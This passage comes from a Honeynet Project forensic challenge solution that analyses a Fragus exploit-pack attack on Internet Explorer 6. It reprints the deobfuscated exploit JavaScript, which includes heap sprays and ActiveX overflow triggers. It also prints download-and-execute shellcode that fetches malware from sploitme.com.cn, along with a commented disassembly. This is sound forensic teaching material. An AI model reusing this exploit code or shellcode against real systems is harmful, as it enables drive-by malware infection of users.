function aolwinamp() { try { var obj = document.createElement('object'); document.body.appendChild(obj); obj.id = 'IWinAmpActiveX'; obj.width = '1'; obj.height = '1'; obj.data = './directshow.php'; obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 20 of 30

Page 21: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u333D"); var bigblock = unescape("%u0c0c%u0c0c"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0, slackspace); var block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fill-block; var memory = new Array(); for (var i = 0; i < 666; i++) { memory[i] = block + shellcode; } document.write('<SCRIPT language="VBScript">'); document.write('bof=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))'); document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1'); document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1'); document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1'); document.write('IWinAmpActiveX.ConvertFile bof,1,1,1,1,1'); document.write('</SCR' + 'IPT>'); } catch(e) {} directshow(); }

function directshow() { var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u343D"); var bigblock = unescape("%u9090%u9090"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0, slackspace); var block = bigblock.substring(0, bigblock.length - slackspace); while (block.length + slackspace < 0x40000) { block = block + block + fillblock; } var memory = new Array(); for (var i = 0; i < 350; i++) { memory[i] = block + shellcode; } try { var obj = document.createElement('object'); document.body.appendChild(obj); obj.width = '1';

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 21 of 30

Page 22: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

obj.height = '1'; obj.data = './directshow.php'; obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'; setTimeout("if (CheckIP()){ Complete(); } else { snapshot(); }", 1000); } catch(e) { snapshot(); } }

function snapshot() { var x; var obj; var mycars = new Array(); mycars[0] = 'c:/Program Files/Outlook Express/wab.exe'; mycars[1] = 'd:/Program Files/Outlook Express/wab.exe'; mycars[2] = 'e:/Program Files/Outlook Express/wab.exe'; try { var obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); } catch(e) { try { var obj = document.createElement('object'); obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90D-C8D9'); obj.setAttribute('id', 'obj'); obj.setAttribute('width', '1'); obj.setAttribute('height', '1'); document.body.appendChild(obj); } catch(e) {} } try { if (obj = '[object]') { for (x in mycars) { obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1'); var buf = mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = 'http://sploitme.com.cn/fg/load.php?e=6'; try { obj.CompressedPath = buf; obj.PrintSnapshot(); var snpelement = document.createElement('iframe'); snpelement.setAttribute('id', 'snapiframe'); snpelement.setAttribute('src', 'about:blank'); snpelement.setAttribute('width', 1); snpelement.setAttribute('height', 1); snpelement.setAttribute('style', 'display:none;'); document.body.appendChild(snpelement); setTimeout("document.getElementById('snapiframe').src = 'ldap://';", 3000); } catch(e) {} } } } catch(e) {} com(); }

function com() { try {

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 22 of 30

Page 23: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

var obj = document.createElement('object'); document.body.appendChild(obj); obj.setAttribute('classid', 'clsid:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F'); if (obj) { var shcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u373D"); var hbs = 0x100000; var sss = hbs - (shcode.length * 2 + 0x38); var hb = (0x0c0c0c0c - hbs) / hbs; var myvar = unescape("%u0C0C%u0C0C"); var ss = myvar; while (ss.length * 2 < sss) { ss += ss; } ss = ss.substring(0, sss / 2); var m = new Array(); for (var i = 0; i < hb; i++) { m[i] = ss + shcode; } var z = Math.ceil(0x0c0c0c0c); z = document.scripts[0].createControlRange().length; } } catch(e) {} spreadsheet(); }

function spreadsheet() { try { var objspread = new ActiveXObject('OWC10.Spreadsheet'); } catch(e) {} if (objspread) { try { var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6C70%u696F%u6D74%u2E65%u6F63%u2E6D%u6E63%u662F%u2F67%u6F6C%u6461%u702E%u7068%u653F%u383D"); var array = new Array(); var ls = 0x81000 - (shellcode.length * 2); var bigblock = unescape("%u0b0c%u0b0C"); while (bigblock.length < ls / 2) { bigblock += bigblock; } var lh = bigblock.substring(0, ls / 2);

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 23 of 30

Page 24: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

delete bigblock; for (var i = 0; i < 0x99 * 2; i++) { array[i] = lh + lh + shellcode; } CollectGarbage(); var objspread = new ActiveXObject("OWC10.Spreadsheet"); e = new Array(); e.push(1); e.push(2); e.push(0); e.push(window); for (i = 0; i < e.length; i++) { for (j = 0; j < 10; j++) { try { objspread.Evaluate(e[i]); } catch(e) {} } } window.status = e[3] + ""; for (j = 0; j < 10; j++) { try { objspread.msDataSourceObject(e[3]); } catch(e) {} } } catch(e) {} } Complete(); } mdac();</script>

http://sploitme.com.cn/fg/show.php

Original:

<script language='JavaScript'><!--var CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi-jklmnopqrstuvwxyz0123456789+/=',decode:function(input){var output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this._keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i++));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+String.fromCharCode(chr1);if(enc3!=64){output=output+String.fromChar-Code(chr2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}output=CRYPT._utf8_decode(output);return output;},_utf8_decode:function(utftext){var string='';var i=0;var c=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(c<128){string+=String.fromCharCode(c);i++;}else if((c>191)&&(c<224)){c2=utftext.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}return string;},obfuscate:function(str){var container='';for(var i=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z%this.signature.length,z%this.signature.length+1).charCodeAt(0));}

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 24 of 30

Page 25: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

return CRYPT.decode(container);}}alert(CRYPT.obfuscate('157181187231195154135166180117123204195156160169153153187179201185191214128142198189161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122130170144210184211201104140130146180175229195190106168156188190222191174168172129166183128168223196152151163160115168188171223176122132193157158179228189189118165157155187151203194176156153191153191181201159152151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155189192158201140173203143179205192190172157139168137136206189190219110143132137119190164209214143137190122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166183128190164176151142104185178161184222161203125128135168122175222205187102171172155170204201175152130137154149119200184180211152142168175170152195217178137170139156121171162195153156165172150179156216194152110121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215189173130191124190191201158214126161182137157168187221176158111191157192158236203174110105158177137212213174160163144170149173190201218207154122130187145211187163176158170160156159183225182213127158180176153219212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151187213204211207174144170136188200223192225152125139184170151200191193141158130147155149219183186126166183118145209214178189174152187133119200224192211132105131175169173192214204104128190167143187235204208119163171154191223204190219110156163179139199164155222151125168115161184217218182172115143'));//--></script>

Deobfuscated:

<script> function Complete() { setTimeout('location.href = "about:blank', 2000); }

function CheckIP() { var req = null; try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { try { req = new XMLHttpRequest(); } catch (e) {} } } if (req == null) return "0"; req.open("GET", "/fg/show.php?get_ajax=1&r=" + Math.random(), false); req.send(null); if (req.responseText == "1") { return true; } else { return false; } } Complete();</script>

Question 7. On the malicious URLs at what do you think the variable 's' refers to? List the differ- Possible Points: 2pts

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 25 of 30

Page 26: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

ences.Tools Used: WiresharkAnswer 7.

‘s’ refers to traffic source ID. It is used to try different exploit sets on different traffic sources. In our example, http://rapidshare.com.eyu32.ru/login.php has a source ID of “3feb5a6b2f”, and http://shop.honeynet.sg/catalog/ has an ‘s’ of “84c090bd86”. Perhaps it is used when the attacker wants to launch more stealth but less powerful exploits on one source and all the exploit set on the another. In our case, for the traffic from http://rapidshare.com.eyu32.ru/login.php, only silent MDAC exploit is sent, and for the http://shop.honeynet.sg/catalog/ many additional exploits are being tried, which include exploits with buffer overflows and heap sprays. There exploits slow down the victim’s system by exhausting memory and may crash the browser, speeding up the detection and removal of the iframe on the infected web site.

Question 8. Which operating system was targeted by the attacks? Which software? And which vul-nerabilities? Could the attacks been prevented?

Possible Points: 4pts

Tools Used: WiresharkAnswer 8.

The attack targets Windows operating systems, particularily Internet Explorer 6 browser and its addons.The vulnerabilities are:

1. Microsoft Data Access Components 2.7 and 2.8 msDataSourceObject() boundary check error (MS06-014), comprehensive information can be found in the CVE DB: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003

2. AOL IWinAmpActiveX ActiveX ConvertFile() overflow, http://osvdb.org/54706(I think it’s not gonna work because of incorrect classid — 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF (corresponds to DirectShow component) instead of FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6)

3. MPEG2TuneRequest ActiveX control stack buffer overflow (MS09-032), http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015

4. Microsoft Office Snapshot Viewer ActiveX arbitrary file download (MS08-041), http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2463

5. COM objects memory corruption (MS05-052), http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-21276. Office Web Components ActiveX stack buffer overflow (MS09-043), http://www.cve.mitre.org/cgi-bin/cvename.cgi?

name=CVE-2009-1534

The attacks could be prevented by applying the corresponding patches for IE6 or by using a different browser.

Question 9. What actions does the shellcodes perform? Please list the shellcodes (+md5 of the bina-ries). What's the difference between them?

Possible Points: 8pts

Tools Used: CommView, vosShellcodeToolkit, IDA, OllyDBGAnswer 9.

All the four shellcodes perform a download&exec on the url which is appended to their end. Details are in the asm listing.MD5 of the shellcodes: 41d013ae668ceee5ee4402bcea7933ce, 1dacf1fbf175fe5361b8601e40deb7f0, 22bed6879e586f9858deb74f61b54de4, 9167201943cc4524d5fc59d57af6bca6

The only difference between the shellcodes is “e” variable in request to load.php script, which sends malware exe-cutable. It likely is used for statistics on how well different exploits perform.

Asm listing with comments of the first shellcode (the others only have different last character):

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 26 of 30

Page 27: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

seg000:00000000 ; Segment type: Pure codeseg000:00000000 seg000 segment byte public 'CODE' use32seg000:00000000 assume cs:seg000seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothingseg000:00000000 xor eax, eaxseg000:00000002 mov eax, fs:[eax+30h]seg000:00000006 js short loc_14seg000:00000008 mov eax, [eax+0Ch]seg000:0000000B mov esi, [eax+1Ch]seg000:0000000E lodsdseg000:0000000F mov ebx, [eax+8] ; ebx = base of kernel32.dll thanks to PEBseg000:00000012 jmp short loc_1Dseg000:00000014 ; ---------------------------------------------------------------------------seg000:00000014seg000:00000014 loc_14: ; CODE XREF: seg000:00000006jseg000:00000014 mov eax, [eax+34h]seg000:00000017 lea eax, [eax+7Ch]seg000:0000001A mov ebx, [eax+3Ch]seg000:0000001Dseg000:0000001D loc_1D: ; CODE XREF: seg000:00000012jseg000:0000001D push 44h ; 'D' ; ||seg000:0000001F pop edx ; ||seg000:00000020 shl edx, 1 ; ||seg000:00000022 sub esp, edx ; ||seg000:00000024 mov ebp, esp ; || setup stack frameseg000:00000026 jmp short loc_77seg000:00000028seg000:00000028 ; =============== S U B R O U T I N E =======================================seg000:00000028seg000:00000028seg000:00000028 sub_28 proc near ; CODE XREF: seg000:00000081pseg000:00000028 pop edxseg000:00000029 push edxseg000:0000002A sub edx, 56h ; 'V'seg000:0000002D mov [ebp+4], edxseg000:00000030 push esiseg000:00000031 push ediseg000:00000032 mov esi, [ebx+3Ch]seg000:00000035 mov esi, [ebx+esi+78h]seg000:00000039 add esi, ebx ; esi = name address tableseg000:0000003B push esiseg000:0000003C mov esi, [esi+20h]seg000:0000003F add esi, ebxseg000:00000041 xor ecx, ecxseg000:00000043 dec ecxseg000:00000044seg000:00000044 loc_44: ; CODE XREF: sub_28+35jseg000:00000044 push eaxseg000:00000045 inc ecxseg000:00000046 lodsdseg000:00000047 xor edi, edi

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 27 of 30

Page 28: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

seg000:00000049seg000:00000049 loc_49: ; CODE XREF: sub_28+30jseg000:00000049 movsx edx, byte ptr ss:[ebx+eax]seg000:0000004E cmp dl, dh ; check for name end (\0)seg000:00000050 jz short loc_5Aseg000:00000052 ror edi, 0Dh ; ||seg000:00000055 add edi, edx ; || calculate name hash in ediseg000:00000057 inc eax ; ||seg000:00000058 jmp short loc_49seg000:0000005A ; ---------------------------------------------------------------------------seg000:0000005Aseg000:0000005A loc_5A: ; CODE XREF: sub_28+28jseg000:0000005A pop eaxseg000:0000005B cmp edi, eax ; is it the needed function?seg000:0000005D jnz short loc_44seg000:0000005F pop esi ; yesseg000:00000060 mov eax, [esi+24h]seg000:00000063 add eax, ebxseg000:00000065 mov cx, [eax+ecx*2]seg000:00000069 mov edx, [esi+1Ch]seg000:0000006C add edx, ebxseg000:0000006E mov eax, [edx+ecx*4]seg000:00000071 add eax, ebx ; eax = function addressseg000:00000073 pop ediseg000:00000074 pop esiseg000:00000075 push eaxseg000:00000076 retn ; retn is used as jmp eaxseg000:00000076 sub_28 endp ; sp-analysis failedseg000:00000076seg000:00000077 ; ---------------------------------------------------------------------------seg000:00000077seg000:00000077 loc_77: ; CODE XREF: seg000:00000026jseg000:00000077 lea edi, [ebp+8]seg000:0000007A push edi ; Bufferseg000:0000007B push edx ; BufSizeseg000:0000007C mov eax, 5B8ACA33h ; eax = hash of 'GetTempPathA'seg000:00000081 call sub_28 ; find and call GetTempPathAseg000:00000086 xor al, alseg000:00000088 mov esi, ediseg000:0000008A repne scasb ; find string end (null-byte)seg000:0000008C dec ediseg000:0000008D mov eax, 78652E65h ; ||seg000:00000092 stosd ; ||seg000:00000093 cbw ; ||seg000:00000095 stosw ; || append 'e.exe',0 to the temppathseg000:00000097 mov al, 6Ch ; 'l'seg000:00000099 mov ah, alseg000:0000009B cwdeseg000:0000009C push eax ; | 'll',0,0seg000:0000009D push 642E6E6Fh ; | 'on.d'seg000:000000A2 push 6D6C7275h ; | 'urlm'seg000:000000A7 push esp ; | FileName = 'urlmon.dll', 0seg000:000000A8 mov eax, 0EC0E4E8Eh ; eax = hash of 'LoadLibraryA'seg000:000000AD call dword ptr [ebp+4] ; find and call LoadLibraryAseg000:000000B0 xchg eax, ebx ; load base of urlmon.dll into ebx

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 28 of 30

Page 29: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

seg000:000000B1 push eaxseg000:000000B2 xor eax, eaxseg000:000000B4 push eax ; lpfnCBseg000:000000B5 push eax ; dwReservedseg000:000000B6 push esi ; szFileNameseg000:000000B7 mov edx, [ebp+4]seg000:000000BA add edx, 7Fh ; ''�seg000:000000BD add edx, 31h ; '1' ; add offset to the URL (aHttpSploitme_c)seg000:000000C0 push edx ; szURLseg000:000000C1 push eax ; pCallerseg000:000000C2 mov eax, 702F1A36h ; eax = hash of 'URLDownload-ToFileA'seg000:000000C7 call dword ptr [ebp+4] ; find and call URLDownloadToFileAseg000:000000CA pop ebx ; restore base of kernel32 into ebxseg000:000000CB xor edi, ediseg000:000000CD push edi ; uCmdShowseg000:000000CE push esi ; lpCmdLineseg000:000000CF mov eax, 0E8AFE98h ; eax = hash of 'WinExec'seg000:000000D4 call dword ptr [ebp+4] ; find and call WinExecseg000:000000D7 push edi ; dwExitCodeseg000:000000D8 mov eax, 60E0CEEFh ; eax = hash of 'ExitThread'seg000:000000DD call dword ptr [ebp+4] ; find and call ExitThreadseg000:000000DD ; ---------------------------------------------------------------------------seg000:000000E0 aHttpSploitme_c db 'http://sploitme.com.cn/fg/load.php?e=3'seg000:000000E0 seg000 endsseg000:000000E0seg000:000000E0seg000:000000E0 end

Question 10. Was there malware involved? What is the purpose of the malware(s)? (We are not look-ing for a detailed malware analysis for this challenge)

Possible Points: 4pts

Tools Used: CommView, OllyDBGAnswer 10.

Yeah, the “malware” is a win32 executable 12288 bytes in length, MD5 is 52312bb96ce72f230f0350e78873f791, file name sent by load.php is “video.exe”.

“Malware” performs these steps:

1. Opens its own executable2. Reads last 512 bytes (overlay)3. Checks if the read string starts with “urlRetriever|”4. Executes "C:\Program Files\Internet Explorer\iexplore.exe" "{part of read string after urlRetriever|}"

In our case, it opens http://www.honeynet.org in Internet ExplorerThis may be used for gathering actual infection statistics and comparing them to EXE load statistics gathered by load.php

BonusUXVlc3Rpb24gQm9udXMgKGZvciBmdW4pLiBBZGRpdGlvbmFsIDEgcG9pbnQgZm9yOiAKV2hhdCBjYW4geW91IHRlbGwgYWJvdXQgZGF0ZXMvdGltZT8gQW55dGhpbmcgd3Jvbmc/IENhbiB5

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 29 of 30

Page 30: Know Your Enemy - Blogs | The Honeynet Project Challenge... · Web viewChallenge 2: Browsers under attack (intermediate) Submission Template Submit your solution at by 17:00 EST,

T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2010

b3UgcHJvcG9zZSBhIHBsYXVzaWJsZSBleHBsYW5hdGlvbj8KRG8geW91IHRoaW5rIHRoYXQgdGhlIG5ldHdvcmsgY2FwdHVyZSAocGNhcCkgd2FzIG1hZGUgb24gYSBsaXZlIGVudmlyb25tZW50PyAKTools Used: <?=base64_decode(...)?>, WiresharkAnswer

The attack tool place around Tue, 02 Feb 2010 19:06:00 GMT, date and time are taken from http://www.google.fr/ request.

The attack lasts less than 6 minutes, and the hosts 10.0.x.2 register themselves to the network and start to open web pages right after the previous has done its work on the malicious page. After a host finished working with malicious con-tent, there is no more network activity from it.

There is no delay between host’s registering to the network and starting to browse sites (for example, look at packet 20, where a host requests MAC address of the router and packet 22, where it starts an http request to http://rapidshare.-com.eyu32.ru/login.php)

I think 10.0.x.2 are cloned virtual machines, not real workstations. An additional proof to this is that all of them send the same NetBIOS host name “8fd12edd2dc1462”.

The packet capture was made on a “lab” environment.

Additional info: The exploit pack starring in this challenge is “Fragus” pack.

Description in Russian: http://forum.hackzona.ru/forum-f23/fragus-niaoaiaiiay-naycea-yenieieoia-t15295.htmlTranslated: http://translate.google.ru/translate?sl=ru&tl=en&u=http%3A%2F%2Fforum.hackzona.ru%2Fforum-f23%2Ffragus-niaoaiaiiay-naycea-yenieieoia-t15295.html

Googled by Complete() and CheckIP() functions in the malicious js.

Worked exploits: MDAC on 10.0.3.15; MDAC and IWinAmpActiveX on 10.0.4.15However, IWinAmpActiveX exploit had no chance to work because of wrong classid, and I think the shellcode of IWinAmpActiveX (with ?e=3) was executed by a different exploit because no garbage collection took place between the exploit tries, and first heap spray for IWinAmpActiveX stayed in memory.

The work is licensed under a Creative Commons License.Copyright © The Honeynet Project, 2010

Page 30 of 30